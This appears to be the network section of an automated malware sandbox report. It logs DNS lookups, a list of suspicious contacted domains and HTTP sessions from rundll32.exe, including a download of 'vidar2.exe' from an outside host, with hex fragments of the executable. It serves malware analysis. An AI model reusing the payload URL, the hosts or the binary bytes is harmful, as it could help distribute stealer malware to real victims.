                                              Dec 13, 2022 20:08:52.037960052 CET8.8.8.8192.168.2.30x3671No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.219321012 CET8.8.8.8192.168.2.30xd855No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.493618965 CET8.8.8.8192.168.2.30x7d94No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.667063951 CET8.8.8.8192.168.2.30xc32bNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.859112024 CET8.8.8.8192.168.2.30xae2aNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.034872055 CET8.8.8.8192.168.2.30x149cNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.225176096 CET8.8.8.8192.168.2.30xdba4No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.402158022 CET8.8.8.8192.168.2.30xeed4No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.573211908 CET8.8.8.8192.168.2.30x39faNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.742464066 CET8.8.8.8192.168.2.30xc81dNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.936579943 CET8.8.8.8192.168.2.30x1a49No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.106309891 CET8.8.8.8192.168.2.30xa128No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.274415970 CET8.8.8.8192.168.2.30xda09No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.454756975 CET8.8.8.8192.168.2.30x4194No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.623677015 CET8.8.8.8192.168.2.30xef8dNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.803195000 CET8.8.8.8192.168.2.30xd15dNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.967981100 CET8.8.8.8192.168.2.30x1964No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:55.140712023 CET8.8.8.8192.168.2.30x4828No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:55.325320959 CET8.8.8.8192.168.2.30x3cfdNo error (0)kikangalaassociates.com185.98.131.207A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:56.218902111 CET8.8.8.8192.168.2.30x915dNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:56.458796024 CET8.8.8.8192.168.2.30xc783No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:58.052490950 CET8.8.8.8192.168.2.30x9924No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              • fs.microsoft.com
                                              • kikangalaassociates.com
                                              • login.live.com
                                              • iglyuyotce.org
                                                • r3oidsofsios.com
                                              • csigrnv.com
                                              • sigiagum.org
                                              • rdpcbv.net
                                              • arfujedsl.net
                                              • nvtalqe.net
                                              • bprujbtf.com
                                              • ecaapsyol.com
                                              • xmhgchsawe.net
                                              • qmwhbha.net
                                              • hhqusu.net
                                              • nvtkvayro.org
                                              • aroxyrayv.com
                                              • ufutmn.net
                                              • gomlgu.com
                                              • mqmkmifvh.org
                                              • okpnuoeb.net
                                              • prhgrykwf.org
                                              • umgkkbyv.org
                                              • bljwplujsw.com
                                              • jqdieq.net
                                              • qrlpwddo.net
                                              • hmsoq.net
                                              • rwsblto.com
                                              • ikihxohlb.com
                                              • sdeypctxsi.net
                                              • 31.41.244.228
                                              • jenhfc.net
                                              • 62.204.41.79
                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.34969723.35.236.109443C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:07:50 UTC0OUTHEAD /fs/windows/config.json HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              Accept-Encoding: identity
                                              User-Agent: Microsoft BITS/7.8
                                              Host: fs.microsoft.com
                                              2022-12-13 19:07:50 UTC0INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                              ApiVersion: Distribute 1.1
                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                              X-Azure-Ref: 0EmKVYwAAAADtlEMMrOgMS4X+rhtfzNmATE9OMjFFREdFMTYwNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                              Cache-Control: public, max-age=35102
                                              Date: Tue, 13 Dec 2022 19:07:50 GMT
                                              Connection: close
                                              X-CID: 2


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.34969823.35.236.109443C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:07:50 UTC0OUTGET /fs/windows/config.json HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              Accept-Encoding: identity
                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                              Range: bytes=0-2147483646
                                              User-Agent: Microsoft BITS/7.8
                                              Host: fs.microsoft.com
                                              2022-12-13 19:07:50 UTC0INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                              ApiVersion: Distribute 1.1
                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                              X-Azure-Ref: 0VeCoYgAAAABR/Z6+30B1RLQsXmQnL8CBTE9OMjFFREdFMDIxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                              Cache-Control: public, max-age=56864
                                              Date: Tue, 13 Dec 2022 19:07:50 GMT
                                              Content-Length: 55
                                              Connection: close
                                              X-CID: 2
                                              2022-12-13 19:07:50 UTC1INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              10192.168.2.34973420.190.159.19443C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:09:13 UTC635OUTPOST /RST2.srf HTTP/1.0
                                              Connection: Keep-Alive
                                              Content-Type: application/soap+xml
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                              Content-Length: 4682
                                              Host: login.live.com
                                              2022-12-13 19:09:13 UTC635OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                              2022-12-13 19:09:13 UTC640INHTTP/1.1 200 OK
                                              Cache-Control: no-store, no-cache
                                              Pragma: no-cache
                                              Content-Type: application/soap+xml; charset=utf-8
                                              Expires: Tue, 13 Dec 2022 19:08:13 GMT
                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              Referrer-Policy: strict-origin-when-cross-origin
                                              x-ms-route-info: R3_BL2
                                              x-ms-request-id: 6fb5ce69-f3f7-4005-80a0-1d412e503aad
                                              PPServer: PPV: 30 H: BL6PPF8DFC8823E V: 0
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              X-XSS-Protection: 1; mode=block
                                              Date: Tue, 13 Dec 2022 19:09:13 GMT
                                              Connection: close
                                              Content-Length: 10857
                                              2022-12-13 19:09:13 UTC641INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.349723185.98.131.207443C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:08:55 UTC1OUTGET /vidar2.exe HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Host: kikangalaassociates.com


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3185.98.131.207443192.168.2.349723C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-12-13 19:08:55 UTC1INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Tue, 13 Dec 2022 19:08:55 GMT
                                              Content-Type: application/x-msdos-program
                                              Content-Length: 559616
                                              Connection: close
                                              Last-Modified: Tue, 13 Dec 2022 16:00:33 GMT
                                              ETag: "88a00-5efb7b84649bb"
                                              Accept-Ranges: bytes
                                              2022-12-13 19:08:55 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ea 02 3b e9 ae 63 55 ba ae 63 55 ba ae 63 55 ba ba 08 56 bb a3 63 55 ba ba 08 50 bb 09 63 55 ba ba 08 51 bb b8 63 55 ba ce 19 51 bb bf 63 55 ba ce 19 56 bb bb 63 55 ba ba 08 54 bb ab 63 55 ba ae 63 54 ba f6 63 55 ba ce 19 50 bb e4 63 55 ba ca 19 5c bb af 63 55 ba ca 19 aa ba af 63 55 ba ca 19 57 bb af 63 55 ba 52 69 63 68 ae 63 55 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$;cUcUcUVcUPcUQcUQcUVcUTcUcTcUPcU\cUcUWcURichcU
                                              2022-12-13 19:08:55 UTC17INData Raw: 81 f9 00 10 00 00 72 27 8d 41 23 3b c1 0f 86 e4 00 00 00 50 e8 86 26 00 00 83 c4 04 85 c0 0f 84 d8 00 00 00 8d 70 23 83 e6 e0 89 46 fc eb 13 85 c9 74 0d 51 e8 66 26 00 00 83 c4 04 8b f0 eb 02 33 f6 8b 44 24 10 89 43 10 0f be 44 24 2c 89 44 24 18 8b 44 24 28 89 7b 14 8d 3c 2e 03 c7 83 7c 24 14 10 89 44 24 10 55 72 5b 8b 3b 57 56 e8 eb 38 00 00 ff 74 24 34 8d 04 2e ff 74 24 28 50 e8 2a 40 00 00 8b 44 24 28 83 c4 18 8b 4c 24 14 41 c6 00 00 81 f9 00 10 00 00 72 12 8b 57 fc 83 c1 23 2b fa 8d 47 fc 83 f8 1f 77 51 8b fa 51 57 e8 1b 26 00 00 83 c4 08 89 33 8b c3 5f 5e 5d 5b 83 c4 0c c2 10 00 53 56 e8 92 38 00 00 ff 74 24 34 ff 74 24 28 57 e8 d4 3f 00 00 8b 44 24 28 83 c4 18 5f c6 00 00 8b c3 89 33 5e 5d 5b 83 c4 0c c2 10 00 e8 d7 c6 ff ff e8 52 c6 ff ff e8 5b 8d
                                              Data Ascii: r'A#;P&p#FtQf&3D$CD$,D$D$({<.|$D$Ur[;WV8t$4.t$(P*@D$(L$ArW#+GwQQW&3_^][SV8t$4t$(W?D$(_3^][R[
                                              2022-12-13 19:08:55 UTC33INData Raw: 74 0c 8b 40 04 85 c0 75 f5 33 c0 40 5d c3 33 c0 5d c3 55 8b ec 8b 4d 0c 8b 55 08 56 8b 01 8b 71 04 03 c2 85 f6 78 0d 8b 49 08 8b 14 16 8b 0c 0a 03 ce 03 c1 5e 5d c3 55 8b ec 56 8b 75 08 57 8b 3e 81 3f 52 43 43 e0 74 12 81 3f 4d 4f 43 e0 74 0a 81 3f 63 73 6d e0 74 1b eb 13 e8 5a 1a 00 00 83 78 18 00 7e 08 e8 4f 1a 00 00 ff 48 18 5f 33 c0 5e 5d c3 e8 41 1a 00 00 89 78 10 8b 76 04 e8 36 1a 00 00 89 70 14 e8 5f a2 00 00 cc e8 28 1a 00 00 83 c0 10 c3 e8 1f 1a 00 00 83 c0 14 c3 e9 47 a2 00 00 cc cc cc cc cc cc cc cc cc cc 8b 4c 24 0c 0f b6 44 24 08 8b d7 8b 7c 24 04 85 c9 0f 84 3c 01 00 00 69 c0 01 01 01 01 83 f9 20 0f 86 df 00 00 00 81 f9 80 00 00 00 0f 82 8b 00 00 00 0f ba 25 a8 90 48 00 01 73 09 f3 aa 8b 44 24 04 8b fa c3 0f ba 25 30 20 43 00 01 0f 83 b2 00
                                              Data Ascii: t@u3@]3]UMUVqxI^]UVuW>?RCCt?MOCt?csmtZx~OH_3^]Axv6p_(GL$D$|$<i %HsD$%0 C
                                              2022-12-13 19:08:55 UTC49INData Raw: ff 36 e8 e8 f0 ff ff 83 c4 10 84 c0 74 19 85 ff 75 08 bf b8 5f 42 00 89 7e 34 53 57 c6 46 3c 01 e8 08 37 00 00 eb 13 85 ff 75 08 bf c8 5f 42 00 89 7e 34 53 57 e8 d1 35 00 00 59 59 5f 89 46 38 b0 01 5e 5b c3 83 39 00 75 13 e8 d7 0e 00 00 c7 00 16 00 00 00 e8 f2 0d 00 00 32 c0 c3 b0 01 c3 83 79 1c 00 74 19 83 79 1c 07 74 13 e8 b5 0e 00 00 c7 00 16 00 00 00 e8 d0 0d 00 00 32 c0 c3 b0 01 c3 8b ff 55 8b ec 8b d1 8b 0a 8b 41 08 3b 41 04 8b 45 0c 75 14 80 79 0c 00 74 04 ff 00 eb 03 83 08 ff 8b 02 8a 40 0c eb 16 ff 00 8b 02 ff 40 08 8b 02 8b 08 8a 45 08 88 01 8b 02 ff 00 b0 01 5d c2 08 00 8b ff 55 8b ec 83 ec 10 a1 14 20 43 00 33 c5 89 45 fc 53 56 8b f1 57 80 7e 3c 00 74 5c 83 7e 38 00 7e 56 8b 7e 34 33 db ff 76 08 0f b7 07 8d 7f 02 83 65 f0 00 50 6a 06 8d 45 f4
                                              Data Ascii: 6tu_B~4SWF<7u_B~4SW5YY_F8^[9u2ytyt2UA;AEuyt@@E]U C3ESVW~<t\~8~V~43vePjE
                                              2022-12-13 19:08:55 UTC65INData Raw: 02 33 c0 5e 5d c3 8b ff 55 8b ec 5d e9 fc fc ff ff a1 d8 93 48 00 85 c0 75 22 39 05 dc 93 48 00 74 18 e8 16 00 00 00 85 c0 74 09 e8 5f 01 00 00 85 c0 75 06 a1 d8 93 48 00 c3 33 c0 c3 83 3d d8 93 48 00 00 74 03 33 c0 c3 56 57 e8 88 a1 00 00 e8 77 a4 00 00 8b f0 85 f6 75 05 83 cf ff eb 24 56 e8 2a 00 00 00 59 85 c0 75 05 83 cf ff eb 0c a3 e4 93 48 00 33 ff a3 d8 93 48 00 6a 00 e8 1a 24 00 00 59 56 e8 13 24 00 00 59 8b c7 5f 5e c3 8b ff 55 8b ec 51 51 53 8b 5d 08 33 d2 56 57 8b f3 8a 03 eb 18 3c 3d 74 01 42 8b ce 8d 79 01 8a 01 41 84 c0 75 f9 2b cf 46 03 f1 8a 06 84 c0 75 e4 8d 42 01 6a 04 50 e8 74 23 00 00 8b f8 59 59 85 ff 74 6e 89 7d fc eb 52 8b cb 8d 71 01 8a 01 41 84 c0 75 f9 2b ce 8d 41 01 89 45 f8 80 fa 3d 74 37 6a 01 50 e8 46 23 00 00 8b f0 59 59 85
                                              Data Ascii: 3^]U]Hu"9Htt_uH3=Ht3VWwu$V*YuH3Hj$YV$Y_^UQQS]3VW<=tByAu+FuBjPt#YYtn}RqAu+AE=t7jPF#YY
                                              2022-12-13 19:08:55 UTC81INData Raw: e8 ac 04 00 00 8b 55 fc 83 c4 0c 81 c2 00 fa ff ff dd 55 f0 d9 ee 81 fa ce fb ff ff 7d 07 33 ff de c9 47 eb 67 de d9 df e0 f6 c4 41 75 09 c7 45 fc 01 00 00 00 eb 04 83 65 fc 00 8b 45 f6 b9 03 fc ff ff 83 e0 0f 83 c8 10 66 89 45 f6 3b d1 7d 30 8b 45 f0 2b ca 8b 55 f4 f6 45 f0 01 74 05 85 ff 75 01 47 d1 e8 f6 45 f4 01 89 45 f0 74 08 0d 00 00 00 80 89 45 f0 d1 ea 89 55 f4 83 e9 01 75 d8 83 7d fc 00 dd 45 f0 74 02 d9 e0 8b 45 0c dd 18 eb 05 33 ff dd d8 47 85 ff 5f 74 08 6a 10 e8 25 06 00 00 59 83 e6 fd f6 c3 10 74 11 f6 45 10 20 74 0b 6a 20 e8 0f 06 00 00 59 83 e6 ef 33 c0 85 f6 5e 0f 94 c0 5b c9 c3 8b ff 55 8b ec 6a 00 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 05 00 00 00 83 c4 1c 5d c3 8b ff 55 8b ec 8b 45 08 33 c9 53 33 db 43 89 48 04 8b 45
                                              Data Ascii: UU}3GgAuEeEfE;}0E+UEtuGEEtEUu}EtE3G_tj%YtE tj Y3^[Ujuuuuuu]UE3S3CHE
                                              2022-12-13 19:08:55 UTC97INData Raw: 76 d3 66 0f d7 c2 25 ff 00 00 00 3d ff 00 00 00 74 23 66 0f 12 4c 24 0c 66 0f c5 c1 03 25 00 80 00 00 83 f8 00 74 07 dd 05 90 83 42 00 c3 dd 05 88 83 42 00 c3 66 0f 12 4c 24 0c 66 0f c5 c1 03 25 00 80 00 00 83 f8 00 0f 84 1f 01 00 00 d9 ee c3 66 0f 12 4c 24 0c 66 0f c5 c1 03 25 00 80 00 00 83 f8 00 0f 84 03 01 00 00 d9 ee c3 f2 0f 58 e4 f2 0f 10 c4 ba ee 03 00 00 e9 5d 01 00 00 66 0f 12 54 24 04 66 0f 7e d0 66 0f 73 d2 20 66 0f 7e d2 81 e2 ff ff ff 7f 0b c2 b9 00 00 00 00 83 f8 00 0f 84 80 fe ff ff 66 0f 12 0d 78 83 42 00 66 0f 12 05 b0 83 42 00 f2 0f 59 c9 ba 1c 00 00 00 e9 16 01 00 00 66 0f 12 64 24 04 66 0f 12 54 24 0c 66 0f 7e e0 83 f8 00 75 20 66 0f 73 d4 20 66 0f 7e e2 81 fa 00 00 f0 3f 0f 84 e9 00 00 00 81 fa 00 00 f0 bf 75 03 d9 e8 c3 66 0f 12 1d
                                              Data Ascii: vf%=t#fL$f%tBBfL$f%fL$f%X]fT$f~fs f~fxBfBYfd$fT$f~u fs f~?uf
                                              2022-12-13 19:08:55 UTC113INData Raw: a0 02 00 00 33 c0 66 39 02 75 58 8b cf 8d 59 02 66 8b 01 83 c1 02 66 3b 85 78 ff ff ff 75 f1 eb 2a 33 db 81 c9 00 01 00 00 8d 96 a0 02 00 00 89 4e 58 66 39 1a 75 2c 8b cf 8d 59 02 66 8b 01 83 c1 02 66 3b 85 78 ff ff ff 75 f1 2b cb d1 f9 8d 41 01 50 57 6a 55 52 e8 45 d4 ff ff 83 c4 10 85 c0 75 1c 8b 46 58 c1 e8 02 f7 d0 83 e0 01 5b 8b 4d fc 5f 33 cd 5e e8 16 a6 fe ff c9 c2 0c 00 33 db 53 53 53 53 53 e8 ee 0d ff ff cc 8b ff 55 8b ec 81 ec f4 00 00 00 a1 14 20 43 00 33 c5 89 45 fc 56 57 8b 7d 08 e8 b6 6a ff ff 8b f0 8d 85 0c ff ff ff 6a 78 50 8b 4e 60 f7 d9 1b c9 81 e1 02 f0 ff ff 81 c1 01 10 00 00 51 57 e8 91 8b ff ff 85 c0 75 06 21 46 58 40 eb 56 8d 85 0c ff ff ff 50 ff 76 50 e8 c9 d0 ff ff 59 59 85 c0 75 36 8b cf 53 33 db 8d 51 02 66 8b 01 83 c1 02 66 3b
                                              Data Ascii: 3f9uXYff;xu*3NXf9u,Yff;xu+APWjUREuFX[M_3^3SSSSSU C3EVW}jjxPN`QWu!FX@VPvPYYu6S3Qff;
                                              2022-12-13 19:08:55 UTC129INData Raw: 35 a4 90 48 00 5e 5b 7c 16 0f ae 5d fc 8b 45 fc 83 e1 3f 83 e0 c0 0b c1 89 45 fc 0f ae 55 fc c9 c3 8b ff 55 8b ec 83 ec 20 83 3d 28 98 48 00 00 56 57 74 10 ff 35 68 98 48 00 ff 15 30 40 42 00 8b f8 eb 05 bf c8 07 41 00 8b 45 14 83 f8 1a 0f 8f de 00 00 00 0f 84 cc 00 00 00 83 f8 0e 7f 65 74 50 6a 02 59 2b c1 74 3a 83 e8 01 74 29 83 e8 05 74 15 83 e8 01 0f 85 95 01 00 00 c7 45 e4 24 7c 42 00 e9 01 01 00 00 89 4d e0 c7 45 e4 24 7c 42 00 e9 3f 01 00 00 c7 45 e4 20 7c 42 00 e9 e6 00 00 00 89 4d e0 c7 45 e4 20 7c 42 00 e9 24 01 00 00 c7 45 e0 03 00 00 00 c7 45 e4 18 7c 42 00 e9 11 01 00 00 83 e8 0f 74 54 83 e8 09 74 43 83 e8 01 0f 85 39 01 00 00 c7 45 e4 1c 7c 42 00 8b 45 08 8b cf 8b 75 10 c7 45 e0 04 00 00 00 dd 00 8b 45 0c dd 5d e8 dd 00 8d 45 e0 dd 5d f0 dd
                                              Data Ascii: 5H^[|]E?EUU =(HVWt5hH0@BAEetPjY+t:t)tE$|BME$|B?E |BME |B$EE|BtTtC9E|BEuEE]E]
                                              2022-12-13 19:08:55 UTC145INData Raw: 69 63 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 64 79 6e 61 6d 69 63 20 61 74 65 78 69 74 20 64 65 73 74 72 75 63 74 6f 72 20 66 6f 72 20 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 6c 6f 63 61 6c 20 73 74 61 74 69 63 20 74 68 72 65 61 64 20 67 75 61 72 64 27 00 6f 70 65 72 61 74 6f 72 20 22 22 20 00 00 00 00 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 00 00 00 6f 70 65 72 61 74 6f 72 3c
                                              Data Ascii: ic initializer for '`dynamic atexit destructor for '`vector copy constructor iterator'`vector vbase copy constructor iterator'`managed vector copy constructor iterator'`local static thread guard'operator "" operator co_awaitoperator<
                                              2022-12-13 19:08:55 UTC161INData Raw: 00 00 6c a2 42 00 01 20 00 00 7c a2 42 00 09 20 00 00 88 a2 42 00 0a 20 00 00 94 a2 42 00 3b 20 00 00 a0 a2 42 00 01 24 00 00 b0 a2 42 00 09 24 00 00 bc a2 42 00 0a 24 00 00 c8 a2 42 00 3b 24 00 00 d4 a2 42 00 01 28 00 00 e4 a2 42 00 09 28 00 00 f0 a2 42 00 0a 28 00 00 fc a2 42 00 01 2c 00 00 08 a3 42 00 09 2c 00 00 14 a3 42 00 0a 2c 00 00 20 a3 42 00 01 30 00 00 2c a3 42 00 09 30 00 00 38 a3 42 00 0a 30 00 00 44 a3 42 00 01 34 00 00 50 a3 42 00 09 34 00 00 5c a3 42 00 0a 34 00 00 68 a3 42 00 01 38 00 00 74 a3 42 00 0a 38 00 00 80 a3 42 00 01 3c 00 00 8c a3 42 00 0a 3c 00 00 98 a3 42 00 01 40 00 00 a4 a3 42 00 0a 40 00 00 b0 a3 42 00 0a 44 00 00 bc a3 42 00 0a 48 00 00 c8 a3 42 00 0a 4c 00 00 d4 a3 42 00 0a 50 00 00 e0 a3 42 00 04 7c 00 00 ec a3 42 00 1a
                                              Data Ascii: lB |B B B; B$B$B$B;$B(B(B(B,B,B, B0,B08B0DB4PB4\B4hB8tB8B<B<B@B@BDBHBLBPB|B
                                              2022-12-13 19:08:55 UTC177INData Raw: 00 75 51 a0 1e 3f a4 fe 34 25 40 ae 40 3d 00 00 00 76 53 00 1f 3f 2a ad 0a 71 77 fa 47 3d 00 00 00 7e 55 60 1f 3f 4b 20 13 e1 b4 bd 2b 3d 00 00 00 8b 57 c0 1f 3f 46 d2 50 6e 3b 8d 4d 3d 00 00 80 cf 2c 10 20 3f e9 5d a1 06 fc d3 4b 3d 00 00 80 af 2d 38 20 3f c9 c6 8e 49 a1 93 4d 3d 00 00 80 bf 2e 68 20 3f f0 a7 35 f9 6d cb 33 3d 00 00 00 d2 2f 98 20 3f da cf 20 99 08 e1 4d 3d 00 00 00 e8 30 c8 20 3f ac b1 a6 12 b0 85 49 3d 00 00 00 d2 31 f0 20 3f 90 22 ba b9 e1 13 49 3d 00 00 00 ee 32 20 21 3f bc ed 80 79 a5 24 16 3d 00 00 80 0c 34 50 21 3f f3 5f 12 09 e7 1e 44 3d 00 00 80 2e 35 80 21 3f 5d 8b f4 75 e5 45 3a 3d 00 00 80 22 36 a8 21 3f 6c 8a 23 1e dd 01 35 3d 00 00 00 4a 37 d8 21 3f 2c aa a6 1e bc 91 41 3d 00 00 00 75 38 08 22 3f b0 f7 21 79 23 23 e3 3c 00
